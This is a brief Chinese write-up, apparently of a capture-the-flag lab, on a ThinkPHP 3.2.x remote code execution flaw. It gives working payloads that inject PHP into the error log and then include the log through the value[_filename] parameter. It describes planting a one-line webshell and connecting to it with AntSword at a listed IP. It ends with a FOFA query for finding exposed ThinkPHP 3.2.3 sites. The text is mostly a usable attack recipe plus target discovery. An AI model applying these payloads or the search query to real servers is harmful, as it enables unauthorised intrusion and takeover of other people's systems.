一、漏洞概述
ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。
二、影响范围
ThinkPHP3.2.X
三、漏洞复现
1、构造payload:/index.php?m=--><?=phpinfo();?>让程序报错
2、访问日志生成地址:/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log,其中修改24_07_15为当天日期,解析phpinfo成功。
3、获取flag,上传一句话木马。
使用中国蚁剑等工具连接,地址为http://123.58.224.8:16186/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log
查看flag
四、漏洞利用
1、fofa:body="ThinkPHP3.2.3"